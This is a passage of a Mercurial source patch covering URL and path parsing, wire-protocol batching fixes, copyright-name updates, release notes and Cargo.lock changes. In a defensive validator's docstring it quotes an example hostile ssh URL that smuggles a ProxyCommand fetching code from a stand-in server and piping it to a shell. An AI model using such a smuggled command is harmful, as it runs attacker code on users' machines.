reasons, we can't handle bundle paths as + # normal URLS + if path.startswith(b'bundle:'): + self.scheme = b'bundle' + path = path[7:] + if path.startswith(b'//'): + path = path[2:] + self.path = path + return + + if self._matchscheme(path): + parts = path.split(b':', 1) + if parts[0]: + self.scheme, path = parts + self._localpath = False + + if not path: + path = None + if self._localpath: + self.path = b'' + return + else: + if self._localpath: + self.path = path + return + + if parsequery and b'?' in path: + path, self.query = path.split(b'?', 1) + if not path: + path = None + if not self.query: + self.query = None + + # // is required to specify a host/authority + if path and path.startswith(b'//'): + parts = path[2:].split(b'/', 1) + if len(parts) > 1: + self.host, path = parts + else: + self.host = parts[0] + path = None + if not self.host: + self.host = None + # path of file:///d is /d + # path of file:///d:/ is d:/, not /d:/ + if path and not hasdriveletter(path): + path = b'/' + path + + if self.host and b'@' in self.host: + self.user, self.host = self.host.rsplit(b'@', 1) + if b':' in self.user: + self.user, self.passwd = self.user.split(b':', 1) + if not self.host: + self.host = None + + # Don't split on colons in IPv6 addresses without ports + if ( + self.host + and b':' in self.host + and not ( + self.host.startswith(b'[') and self.host.endswith(b']') + ) + ): + self._hostport = self.host + self.host, self.port = self.host.rsplit(b':', 1) + if not self.host: + self.host = None + + if ( + self.host + and self.scheme == b'file' + and self.host not in (b'localhost', b'127.0.0.1', b'[::1]') + ): + raise error.Abort( + _(b'file:// URLs can only refer to localhost') + ) + + self.path = path + + # leave the query string escaped + for a in (b'user', b'passwd', b'host', b'port', b'path', b'fragment'): + v = getattr(self, a) + if v is not None: + setattr(self, a, urlreq.unquote(v)) + + def copy(self): + u = url(b'temporary useless value') + u.path = self.path + u.scheme = self.scheme + u.user = self.user + u.passwd = self.passwd + u.host = self.host + u.path = self.path + u.query = self.query + u.fragment = self.fragment + u._localpath = self._localpath + u._hostport = self._hostport + u._origpath = self._origpath + return u + + @encoding.strmethod + def __repr__(self): + attrs = [] + for a in ( + b'scheme', + b'user', + b'passwd', + b'host', + b'port', + b'path', + b'query', + b'fragment', + ): + v = getattr(self, a) + if v is not None: + attrs.append(b'%s: %r' % (a, pycompat.bytestr(v))) + return b'<url %s>' % b', '.join(attrs) + + def __bytes__(self): + r"""Join the URL's components back into a URL string. + + Examples: + + >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar')) + 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar' + >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42')) + 'http://user:pw@host:80/?foo=bar&baz=42' + >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz')) + 'http://user:pw@host:80/?foo=bar%3dbaz' + >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#')) + 'ssh://user:pw@[::1]:2200//home/joe#' + >>> bytes(url(b'http://localhost:80//')) + 'http://localhost:80//' + >>> bytes(url(b'http://localhost:80/')) + 'http://localhost:80/' + >>> bytes(url(b'http://localhost:80')) + 'http://localhost:80/' + >>> bytes(url(b'bundle:foo')) + 'bundle:foo' + >>> bytes(url(b'bundle://../foo')) + 'bundle:../foo' + >>> bytes(url(b'path')) + 'path' + >>> bytes(url(b'file:///tmp/foo/bar')) + 'file:///tmp/foo/bar' + >>> bytes(url(b'file:///c:/tmp/foo/bar')) + 'file:///c:/tmp/foo/bar' + >>> print(url(br'bundle:foo\bar')) + bundle:foo\bar + >>> print(url(br'file:///D:\data\hg')) + file:///D:\data\hg + """ + if self._localpath: + s = self.path + if self.scheme == b'bundle': + s = b'bundle:' + s + if self.fragment: + s += b'#' + self.fragment + return s + + s = self.scheme + b':' + if self.user or self.passwd or self.host: + s += b'//' + elif self.scheme and ( + not self.path + or self.path.startswith(b'/') + or hasdriveletter(self.path) + ): + s += b'//' + if hasdriveletter(self.path): + s += b'/' + if self.user: + s += urlreq.quote(self.user, safe=self._safechars) + if self.passwd: + s += b':' + urlreq.quote(self.passwd, safe=self._safechars) + if self.user or self.passwd: + s += b'@' + if self.host: + if not (self.host.startswith(b'[') and self.host.endswith(b']')): + s += urlreq.quote(self.host) + else: + s += self.host + if self.port: + s += b':' + urlreq.quote(self.port) + if self.host: + s += b'/' + if self.path: + # TODO: similar to the query string, we should not unescape the + # path when we store it, the path might contain '%2f' = '/', + # which we should *not* escape. + s += urlreq.quote(self.path, safe=self._safepchars) + if self.query: + # we store the query in escaped form. + s += b'?' + self.query + if self.fragment is not None: + s += b'#' + urlreq.quote(self.fragment, safe=self._safepchars) + return s + + __str__ = encoding.strmethod(__bytes__) + + def authinfo(self): + user, passwd = self.user, self.passwd + try: + self.user, self.passwd = None, None + s = bytes(self) + finally: + self.user, self.passwd = user, passwd + if not self.user: + return (s, None) + # authinfo[1] is passed to urllib2 password manager, and its + # URIs must not contain credentials. The host is passed in the + # URIs list because Python < 2.4.3 uses only that to search for + # a password. + return (s, (None, (s, self.host), self.user, self.passwd or b'')) + + def isabs(self): + if self.scheme and self.scheme != b'file': + return True # remote URL + if hasdriveletter(self.path): + return True # absolute for our purposes - can't be joined() + if self.path.startswith(br'\\'): + return True # Windows UNC path + if self.path.startswith(b'/'): + return True # POSIX-style + return False + + def localpath(self): + # type: () -> bytes + if self.scheme == b'file' or self.scheme == b'bundle': + path = self.path or b'/' + # For Windows, we need to promote hosts containing drive + # letters to paths with drive letters. + if hasdriveletter(self._hostport): + path = self._hostport + b'/' + self.path + elif ( + self.host is not None and self.path and not hasdriveletter(path) + ): + path = b'/' + path + return path + return self._origpath + + def islocal(self): + '''whether localpath will return something that posixfile can open''' + return ( + not self.scheme + or self.scheme == b'file' + or self.scheme == b'bundle' + ) + + +def hasscheme(path): + # type: (bytes) -> bool + return bool(url(path).scheme) # cast to help pytype + + +def hasdriveletter(path): + # type: (bytes) -> bool + return bool(path) and path[1:2] == b':' and path[0:1].isalpha() + + +def urllocalpath(path): + # type: (bytes) -> bytes + return url(path, parsequery=False, parsefragment=False).localpath() + + +def checksafessh(path): + # type: (bytes) -> None + """check if a path / url is a potentially unsafe ssh exploit (SEC) + + This is a sanity check for ssh urls. ssh will parse the first item as + an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path. + Let's prevent these potentially exploited urls entirely and warn the + user. + + Raises an error.Abort when the url is unsafe. + """ + path = urlreq.unquote(path) + if path.startswith(b'ssh://-') or path.startswith(b'svn+ssh://-'): + raise error.Abort( + _(b'potentially unsafe url: %r') % (pycompat.bytestr(path),) + ) + + +def hidepassword(u): + # type: (bytes) -> bytes + '''hide user credential in a url string''' + u = url(u) + if u.passwd: + u.passwd = b'***' + return bytes(u) + + +def removeauth(u): + # type: (bytes) -> bytes + '''remove all authentication information from a url string''' + u = url(u) + u.user = u.passwd = None + return bytes(u) + + +def get_push_paths(repo, ui, dests): + """yields all the `path` selected as push destination by `dests`""" + if not dests: + if b'default-push' in ui.paths: + yield ui.paths[b'default-push'] + elif b'default' in ui.paths: + yield ui.paths[b'default'] + else: + raise error.ConfigError( + _(b'default repository not configured!'), + hint=_(b"see 'hg help config.paths'"), + ) + else: + for dest in dests: + yield ui.getpath(dest) + + +def get_pull_paths(repo, ui, sources, default_branches=()): + """yields all the `(path, branch)` selected as pull source by `sources`""" + if not sources: + sources = [b'default'] + for source in sources: + if source in ui.paths: + url = ui.paths[source].rawloc + else: + # Try to resolve as a local path or URI. + try: + # we pass the ui instance are warning might need to be issued + url = path(ui, None, rawloc=source).rawloc + except ValueError: + url = source + yield parseurl(url, default_branches) + + +def get_unique_push_path(action, repo, ui, dest=None): + """return a unique `path` or abort if multiple are found + + This is useful for command and action that does not support multiple + destination (yet). + + Note that for now, we cannot get multiple destination so this function is "trivial". + + The `action` parameter will be used for the error message. + """ + if dest is None: + dests = [] + else: + dests = [dest] + dests = list(get_push_paths(repo, ui, dests)) + assert len(dests) == 1 + return dests[0] + + +def get_unique_pull_path(action, repo, ui, source=None, default_branches=()): + """return a unique `(path, branch)` or abort if multiple are found + + This is useful for command and action that does not support multiple + destination (yet). + + Note that for now, we cannot get multiple destination so this function is "trivial". + + The `action` parameter will be used for the error message. + """ + if source is None: + if b'default' in ui.paths: + url = ui.paths[b'default'].rawloc + else: + # XXX this is the historical default behavior, but that is not + # great, consider breaking BC on this. + url = b'default' + else: + if source in ui.paths: + url = ui.paths[source].rawloc + else: + # Try to resolve as a local path or URI. + try: + # we pass the ui instance are warning might need to be issued + url = path(ui, None, rawloc=source).rawloc + except ValueError: + url = source + return parseurl(url, default_branches) + + +def get_clone_path(ui, source, default_branches=()): + """return the `(origsource, path, branch)` selected as clone source""" + if source is None: + if b'default' in ui.paths: + url = ui.paths[b'default'].rawloc + else: + # XXX this is the historical default behavior, but that is not + # great, consider breaking BC on this. + url = b'default' + else: + if source in ui.paths: + url = ui.paths[source].rawloc + else: + # Try to resolve as a local path or URI. + try: + # we pass the ui instance are warning might need to be issued + url = path(ui, None, rawloc=source).rawloc + except ValueError: + url = source + clone_path, branch = parseurl(url, default_branches) + return url, clone_path, branch + + +def parseurl(path, branches=None): + '''parse url#branch, returning (url, (branch, branches))''' + u = url(path) + branch = None + if u.fragment: + branch = u.fragment + u.fragment = None + return bytes(u), (branch, branches or []) + + +class paths(dict): + """Represents a collection of paths and their configs. + + Data is initially derived from ui instances and the config files they have + loaded. + """ + + def __init__(self, ui): + dict.__init__(self) + + for name, loc in ui.configitems(b'paths', ignoresub=True): + # No location is the same as not existing. + if not loc: + continue + loc, sub_opts = ui.configsuboptions(b'paths', name) + self[name] = path(ui, name, rawloc=loc, suboptions=sub_opts) + + for name, p in sorted(self.items()): + p.chain_path(ui, self) + + def getpath(self, ui, name, default=None): + """Return a ``path`` from a string, falling back to default. + + ``name`` can be a named path or locations. Locations are filesystem + paths or URIs. + + Returns None if ``name`` is not a registered path, a URI, or a local + path to a repo. + """ + # Only fall back to default if no path was requested. + if name is None: + if not default: + default = () + elif not isinstance(default, (tuple, list)): + default = (default,) + for k in default: + try: + return self[k] + except KeyError: + continue + return None + + # Most likely empty string. + # This may need to raise in the future. + if not name: + return None + + try: + return self[name] + except KeyError: + # Try to resolve as a local path or URI. + try: + # we pass the ui instance are warning might need to be issued + return path(ui, None, rawloc=name) + except ValueError: + raise error.RepoError(_(b'repository %s does not exist') % name) + + +_pathsuboptions = {} + + +def pathsuboption(option, attr): + """Decorator used to declare a path sub-option. + + Arguments are the sub-option name and the attribute it should set on + ``path`` instances. + + The decorated function will receive as arguments a ``ui`` instance, + ``path`` instance, and the string value of this option from the config. + The function should return the value that will be set on the ``path`` + instance. + + This decorator can be used to perform additional verification of + sub-options and to change the type of sub-options. + """ + + def register(func): + _pathsuboptions[option] = (attr, func) + return func + + return register + + +@pathsuboption(b'pushurl', b'pushloc') +def pushurlpathoption(ui, path, value): + u = url(value) + # Actually require a URL. + if not u.scheme: + ui.warn(_(b'(paths.%s:pushurl not a URL; ignoring)\n') % path.name) + return None + + # Don't support the #foo syntax in the push URL to declare branch to + # push. + if u.fragment: + ui.warn( + _( + b'("#fragment" in paths.%s:pushurl not supported; ' + b'ignoring)\n' + ) + % path.name + ) + u.fragment = None + + return bytes(u) + + +@pathsuboption(b'pushrev', b'pushrev') +def pushrevpathoption(ui, path, value): + return value + + +class path(object): + """Represents an individual path and its configuration.""" + + def __init__(self, ui, name, rawloc=None, suboptions=None): + """Construct a path from its config options. + + ``ui`` is the ``ui`` instance the path is coming from. + ``name`` is the symbolic name of the path. + ``rawloc`` is the raw location, as defined in the config. + ``pushloc`` is the raw locations pushes should be made to. + + If ``name`` is not defined, we require that the location be a) a local + filesystem path with a .hg directory or b) a URL. If not, + ``ValueError`` is raised. + """ + if not rawloc: + raise ValueError(b'rawloc must be defined') + + # Locations may define branches via syntax <base>#<branch>. + u = url(rawloc) + branch = None + if u.fragment: + branch = u.fragment + u.fragment = None + + self.url = u + # the url from the config/command line before dealing with `path://` + self.raw_url = u.copy() + self.branch = branch + + self.name = name + self.rawloc = rawloc + self.loc = b'%s' % u + + self._validate_path() + + _path, sub_opts = ui.configsuboptions(b'paths', b'*') + self._own_sub_opts = {} + if suboptions is not None: + self._own_sub_opts = suboptions.copy() + sub_opts.update(suboptions) + self._all_sub_opts = sub_opts.copy() + + self._apply_suboptions(ui, sub_opts) + + def chain_path(self, ui, paths): + if self.url.scheme == b'path': + assert self.url.path is None + try: + subpath = paths[self.url.host] + except KeyError: + m = _(b'cannot use `%s`, "%s" is not a known path') + m %= (self.rawloc, self.url.host) + raise error.Abort(m) + if subpath.raw_url.scheme == b'path': + m = _(b'cannot use `%s`, "%s" is also defined as a `path://`') + m %= (self.rawloc, self.url.host) + raise error.Abort(m) + self.url = subpath.url + self.rawloc = subpath.rawloc + self.loc = subpath.loc + if self.branch is None: + self.branch = subpath.branch + else: + base = self.rawloc.rsplit(b'#', 1)[0] + self.rawloc = b'%s#%s' % (base, self.branch) + suboptions = subpath._all_sub_opts.copy() + suboptions.update(self._own_sub_opts) + self._apply_suboptions(ui, suboptions) + + def _validate_path(self): + # When given a raw location but not a symbolic name, validate the + # location is valid. + if ( + not self.name + and not self.url.scheme + and not self._isvalidlocalpath(self.loc) + ): + raise ValueError( + b'location is not a URL or path to a local ' + b'repo: %s' % self.rawloc + ) + + def _apply_suboptions(self, ui, sub_options): + # Now process the sub-options. If a sub-option is registered, its + # attribute will always be present. The value will be None if there + # was no valid sub-option. + for suboption, (attr, func) in pycompat.iteritems(_pathsuboptions): + if suboption not in sub_options: + setattr(self, attr, None) + continue + + value = func(ui, self, sub_options[suboption]) + setattr(self, attr, value) + + def _isvalidlocalpath(self, path): + """Returns True if the given path is a potentially valid repository. + This is its own function so that extensions can change the definition of + 'valid' in this case (like when pulling from a git repo into a hg + one).""" + try: + return os.path.isdir(os.path.join(path, b'.hg')) + # Python 2 may return TypeError. Python 3, ValueError. + except (TypeError, ValueError): + return False + + @property + def suboptions(self): + """Return sub-options and their values for this path. + + This is intended to be used for presentation purposes. + """ + d = {} + for subopt, (attr, _func) in pycompat.iteritems(_pathsuboptions): + value = getattr(self, attr) + if value is not None: + d[subopt] = value + return d diff --git a/mercurial/verify.py b/mercurial/verify.py --- a/mercurial/verify.py +++ b/mercurial/verify.py @@ -1,6 +1,6 @@ # verify.py - repository integrity checking for Mercurial # -# Copyright 2006, 2007 Matt Mackall <mpm@selenic.com> +# Copyright 2006, 2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. @@ -416,7 +416,7 @@ storefiles = set() subdirs = set() revlogv1 = self.revlogv1 - for f, f2, size in repo.store.datafiles(): + for t, f, f2, size in repo.store.datafiles(): if not f: self._err(None, _(b"cannot decode filename '%s'") % f2) elif (size > 0 or not revlogv1) and f.startswith(b'meta/'): @@ -480,7 +480,7 @@ ui.status(_(b"checking files\n")) storefiles = set() - for f, f2, size in repo.store.datafiles(): + for rl_type, f, f2, size in repo.store.datafiles(): if not f: self._err(None, _(b"cannot decode filename '%s'") % f2) elif (size > 0 or not revlogv1) and f.startswith(b'data/'): diff --git a/mercurial/vfs.py b/mercurial/vfs.py --- a/mercurial/vfs.py +++ b/mercurial/vfs.py @@ -1,6 +1,6 @@ # vfs.py - Mercurial 'vfs' classes # -# Copyright Matt Mackall <mpm@selenic.com> +# Copyright Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/win32.py b/mercurial/win32.py --- a/mercurial/win32.py +++ b/mercurial/win32.py @@ -1,6 +1,6 @@ # win32.py - utility functions that use win32 API # -# Copyright 2005-2009 Matt Mackall <mpm@selenic.com> and others +# Copyright 2005-2009 Olivia Mackall <olivia@selenic.com> and others # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/windows.py b/mercurial/windows.py --- a/mercurial/windows.py +++ b/mercurial/windows.py @@ -1,6 +1,6 @@ # windows.py - Windows utility function implementations for Mercurial # -# Copyright 2005-2009 Matt Mackall <mpm@selenic.com> and others +# Copyright 2005-2009 Olivia Mackall <olivia@selenic.com> and others # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/wireprotoserver.py b/mercurial/wireprotoserver.py --- a/mercurial/wireprotoserver.py +++ b/mercurial/wireprotoserver.py @@ -1,5 +1,5 @@ # Copyright 21 May 2005 - (c) 2005 Jake Edge <jake@edge2.net> -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/wireprotov1peer.py b/mercurial/wireprotov1peer.py --- a/mercurial/wireprotov1peer.py +++ b/mercurial/wireprotov1peer.py @@ -1,6 +1,6 @@ # wireprotov1peer.py - Client-side functionality for wire protocol version 1. # -# Copyright 2005-2010 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2010 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. @@ -43,14 +43,14 @@ @batchable def sample(self, one, two=None): # Build list of encoded arguments suitable for your wire protocol: - encargs = [('one', encode(one),), ('two', encode(two),)] + encoded_args = [('one', encode(one),), ('two', encode(two),)] # Create future for injection of encoded result: - encresref = future() + encoded_res_future = future() # Return encoded arguments and future: - yield encargs, encresref + yield encoded_args, encoded_res_future # Assuming the future to be filled with the result from the batched # request now. Decode it: - yield decode(encresref.value) + yield decode(encoded_res_future.value) The decorator returns a function which wraps this coroutine as a plain method, but adds the original method as an attribute called "batchable", @@ -60,12 +60,12 @@ def plain(*args, **opts): batchable = f(*args, **opts) - encargsorres, encresref = next(batchable) - if not encresref: - return encargsorres # a local result in this case + encoded_args_or_res, encoded_res_future = next(batchable) + if not encoded_res_future: + return encoded_args_or_res # a local result in this case self = args[0] cmd = pycompat.bytesurl(f.__name__) # ensure cmd is ascii bytestr - encresref.set(self._submitone(cmd, encargsorres)) + encoded_res_future.set(self._submitone(cmd, encoded_args_or_res)) return next(batchable) setattr(plain, 'batchable', f) @@ -257,15 +257,15 @@ # Encoded arguments and future holding remote result. try: - encargsorres, fremote = next(batchable) + encoded_args_or_res, fremote = next(batchable) except Exception: pycompat.future_set_exception_info(f, sys.exc_info()[1:]) return if not fremote: - f.set_result(encargsorres) + f.set_result(encoded_args_or_res) else: - requests.append((command, encargsorres)) + requests.append((command, encoded_args_or_res)) states.append((command, f, batchable, fremote)) if not requests: @@ -310,7 +310,7 @@ if not f.done(): f.set_exception( error.ResponseError( - _(b'unfulfilled batch command response') + _(b'unfulfilled batch command response'), None ) ) @@ -322,16 +322,27 @@ for command, f, batchable, fremote in states: # Grab raw result off the wire and teach the internal future # about it. - remoteresult = next(wireresults) - fremote.set(remoteresult) + try: + remoteresult = next(wireresults) + except StopIteration: + # This can happen in particular because next(batchable) + # in the previous iteration can call peer._abort, which + # may close the peer. + f.set_exception( + error.ResponseError( + _(b'unfulfilled batch command response'), None + ) + ) + else: + fremote.set(remoteresult) - # And ask the coroutine to decode that value. - try: - result = next(batchable) - except Exception: - pycompat.future_set_exception_info(f, sys.exc_info()[1:]) - else: - f.set_result(result) + # And ask the coroutine to decode that value. + try: + result = next(batchable) + except Exception: + pycompat.future_set_exception_info(f, sys.exc_info()[1:]) + else: + f.set_result(result) @interfaceutil.implementer( diff --git a/mercurial/wireprotov1server.py b/mercurial/wireprotov1server.py --- a/mercurial/wireprotov1server.py +++ b/mercurial/wireprotov1server.py @@ -1,6 +1,6 @@ # wireprotov1server.py - Wire protocol version 1 server functionality # -# Copyright 2005-2010 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2010 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. @@ -27,6 +27,7 @@ exchange, pushkey as pushkeymod, pycompat, + requirements as requirementsmod, streamclone, util, wireprototypes, @@ -108,7 +109,7 @@ 4. server.bundle1 """ ui = repo.ui - gd = b'generaldelta' in repo.requirements + gd = requirementsmod.GENERALDELTA_REQUIREMENT in repo.requirements if gd: v = ui.configbool(b'server', b'bundle1gd.%s' % action) @@ -310,7 +311,7 @@ caps.append(b'stream-preferred') requiredformats = repo.requirements & repo.supportedformats # if our local revlogs are just revlogv1, add 'stream' cap - if not requiredformats - {b'revlogv1'}: + if not requiredformats - {requirementsmod.REVLOGV1_REQUIREMENT}: caps.append(b'stream') # otherwise, add 'streamreqs' detailing our local revlog format else: diff --git a/mercurial/wireprotov2server.py b/mercurial/wireprotov2server.py --- a/mercurial/wireprotov2server.py +++ b/mercurial/wireprotov2server.py @@ -1,5 +1,5 @@ # Copyright 21 May 2005 - (c) 2005 Jake Edge <jake@edge2.net> -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. @@ -1582,7 +1582,8 @@ # TODO this is a bunch of storage layer interface abstractions because # it assumes revlogs. - for name, encodedname, size in topfiles: + for rl_type, name, encodedname, size in topfiles: + # XXX use the `rl_type` for that if b'changelog' in files and name.startswith(b'00changelog'): pass elif b'manifestlog' in files and name.startswith(b'00manifest'): diff --git a/mercurial/worker.py b/mercurial/worker.py --- a/mercurial/worker.py +++ b/mercurial/worker.py @@ -442,7 +442,7 @@ we ever write workers that need to preserve grouping in input we should consider allowing callers to specify a partition strategy. - mpm is not a fan of this partitioning strategy when files are involved. + olivia is not a fan of this partitioning strategy when files are involved. In his words: Single-threaded Mercurial makes a point of creating and visiting diff --git a/pyproject.toml b/pyproject.toml new file mode 100644 --- /dev/null +++ b/pyproject.toml @@ -0,0 +1,18 @@ +[build-system] +requires = ["setuptools", "wheel"] +build-backend = "setuptools.build_meta" + +[tool.black] +line-length = 80 +exclude = ''' +build/ +| wheelhouse/ +| dist/ +| packages/ +| \.hg/ +| \.mypy_cache/ +| \.venv/ +| mercurial/thirdparty/ +''' +skip-string-normalization = true +quiet = true diff --git a/relnotes/5.7 b/relnotes/5.7 --- a/relnotes/5.7 +++ b/relnotes/5.7 @@ -17,6 +17,8 @@ can be e.g. `rebase`. As part of this effort, the default format from `hg rebase` was reorganized a bit. + * `hg purge` is now a core command using `--confirm` by default. + * `hg diff` and `hg extdiff` now support `--from <rev>` and `--to <rev>` arguments as clearer alternatives to `-r <revs>`. `-r <revs>` has been deprecated. @@ -43,6 +45,9 @@ * The `branchmap` cache is updated more intelligently and can be significantly faster for repositories with many branches and changesets. + * The `rev-branch-cache` is now updated incrementally whenever changesets + are added. + == New Experimental Features == @@ -64,4 +69,5 @@ == Internal API Changes == - + * `changelog.branchinfo` is deprecated and will be removed after 5.8. + It is superseded by `changelogrevision.branchinfo`. diff --git a/relnotes/next b/relnotes/next --- a/relnotes/next +++ b/relnotes/next @@ -1,8 +1,24 @@ == New Features == + + * `hg purge` is now a core command using `--confirm` by default. + + * The `rev-branch-cache` is now updated incrementally whenever changesets + are added. + * The new options `experimental.bundlecompthreads` and + `experimental.bundlecompthreads.<engine>` can be used to instruct + the compression engines for bundle operations to use multiple threads + for compression. The default is single threaded operation. Currently + only supported for zstd. == New Experimental Features == + * There's a new `diff.merge` config option to show the changes + relative to an automerge for merge changesets. This makes it + easier to detect and review manual changes performed in merge + changesets. It is supported by `hg diff --change`, `hg log -p` + `hg incoming -p`, and `hg outgoing -p` so far. + == Bug Fixes == @@ -10,7 +26,24 @@ == Backwards Compatibility Changes == + * In normal repositories, the first parent of a changeset is not null, + unless both parents are null (like the first changeset). Some legacy + repositories violate this condition. The revlog code will now + silentely swap the parents if this condition is tested. This can + change the output of `hg log` when explicitly asking for first or + second parent. + == Internal API Changes == + * `changelog.branchinfo` is deprecated and will be removed after 5.8. + It is superseded by `changelogrevision.branchinfo`. + * Callbacks for revlog.addgroup and the changelog._nodeduplicatecallback hook + now get a revision number as argument instead of a node. + + * revlog.addrevision returns the revision number instead of the node. + + * `nodes.nullid` and related constants are being phased out as part of + the deprecation of SHA1. Repository instances and related classes + provide access via `nodeconstants` and in some cases `nullid` attributes. diff --git a/rust/Cargo.lock b/rust/Cargo.lock --- a/rust/Cargo.lock +++ b/rust/Cargo.lock @@ -4,1009 +4,1101 @@ name = "adler" version = "0.2.3" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "ee2a4ec343196209d6594e19543ae87a39f96d5534d7174822a3ad825dd6ed7e" [[package]] name = "aho-corasick" version = "0.7.15" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "7404febffaa47dac81aa44dba71523c9d069b1bdc50a77db41195149e17f68e5" dependencies = [ - "memchr 2.3.4 (registry+https://github.com/rust-lang/crates.io-index)", + "memchr", ] [[package]] name = "ansi_term" version = "0.11.0" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "ee49baf6cb617b853aa8d93bf420db2383fab46d314482ca2803b40d5fde979b" dependencies = [ - "winapi 0.3.9 (registry+https://github.com/rust-lang/crates.io-index)", + "winapi", ] [[package]] name = "atty" version = "0.2.14" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "d9b39be18770d11421cdb1b9947a45dd3f37e93092cbf377614828a319d5fee8" dependencies = [ - "hermit-abi 0.1.17 (registry+https://github.com/rust-lang/crates.io-index)", - "libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)", - "winapi 0.3.9 (registry+https://github.com/rust-lang/crates.io-index)", + "hermit-abi", + "libc", + "winapi", ] [[package]] name = "autocfg" version = "1.0.1" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "cdb031dd78e28731d87d56cc8ffef4a8f36ca26c38fe2de700543e627f8a464a" [[package]] name = "bitflags" version = "1.2.1" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "cf1de2fe8c75bc145a2f577add951f8134889b4795d47466a54a5c846d691693" [[package]] name = "bitmaps" version = "2.1.0" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "031043d04099746d8db04daf1fa424b2bc8bd69d92b25962dcde24da39ab64a2" dependencies = [ - "typenum 1.12.0 (registry+https://github.com/rust-lang/crates.io-index)", + "typenum", ] [[package]] name = "byteorder" version = "1.3.4" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "08c48aae112d48ed9f069b33538ea9e3e90aa263cfa3d1c24309612b1f7472de" + +[[package]] +name = "bytes-cast" +version = "0.1.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "3196ba300c7bc9282a4331e878496cb3e9603a898a8f1446601317163e16ca52" +dependencies = [ + "bytes-cast-derive", +] + +[[package]] +name = "bytes-cast-derive" +version = "0.1.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "cb936af9de38476664d6b58e529aff30d482e4ce1c5e150293d00730b0d81fdb" +dependencies = [ + "proc-macro2", + "quote", + "syn", +] [[package]] name = "cc" version = "1.0.66" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "4c0496836a84f8d0495758516b8621a622beb77c0fed418570e50764093ced48" dependencies = [ - "jobserver 0.1.21 (registry+https://github.com/rust-lang/crates.io-index)", + "jobserver", ] [[package]] name = "cfg-if" version = "0.1.10" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "4785bdd1c96b2a846b2bd7cc02e86b6b3dbf14e7e53446c4f54c92a361040822" [[package]] name = "cfg-if" version = "1.0.0" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "baf1de4339761588bc0619e3cbc0120ee582ebb74b53b4efbf79117bd2da40fd" + +[[package]] +name = "chrono" +version = "0.4.19" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "670ad68c9088c2a963aaa298cb369688cf3f9465ce5e2d4ca10e6e0098a1ce73" +dependencies = [ + "libc", + "num-integer", + "num-traits", + "time", + "winapi", +] [[package]] name = "clap" version = "2.33.3" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "37e58ac78573c40708d45522f0d80fa2f01cc4f9b4e2bf749807255454312002" dependencies = [ - "ansi_term 0.11.0 (registry+https://github.com/rust-lang/crates.io-index)", - "atty 0.2.14 (registry+https://github.com/rust-lang/crates.io-index)", - "bitflags 1.2.1 (registry+https://github.com/rust-lang/crates.io-index)", - "strsim 0.8.0 (registry+https://github.com/rust-lang/crates.io-index)", - "textwrap 0.11.0 (registry+https://github.com/rust-lang/crates.io-index)", - "unicode-width 0.1.8 (registry+https://github.com/rust-lang/crates.io-index)", - "vec_map 0.8.2 (registry+https://github.com/rust-lang/crates.io-index)", + "ansi_term", + "atty", + "bitflags", + "strsim", + "textwrap", + "unicode-width", + "vec_map", ] [[package]] name = "const_fn" version = "0.4.4" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "cd51eab21ab4fd6a3bf889e2d0958c0a6e3a61ad04260325e919e652a2a62826" [[package]] name = "cpython" -version = "0.4.1" +version = "0.5.2" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "0f11357af68648b6a227e7e2384d439cec8595de65970f45e3f7f4b2600be472" dependencies = [ - "libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)", - "num-traits 0.2.14 (registry+https://github.com/rust-lang/crates.io-index)", - "python27-sys 0.4.1 (registry+https://github.com/rust-lang/crates.io-index)", - "python3-sys 0.4.1 (registry+https://github.com/rust-lang/crates.io-index)", + "libc", + "num-traits", + "paste", + "python27-sys", + "python3-sys", ] [[package]] name = "crc32fast" version = "1.2.1" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "81156fece84ab6a9f2afdb109ce3ae577e42b1228441eded99bd77f627953b1a" dependencies = [ - "cfg-if 1.0.0 (registry+https://github.com/rust-lang/crates.io-index)", + "cfg-if 1.0.0", ] [[package]] name = "crossbeam-channel" version = "0.4.4" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = 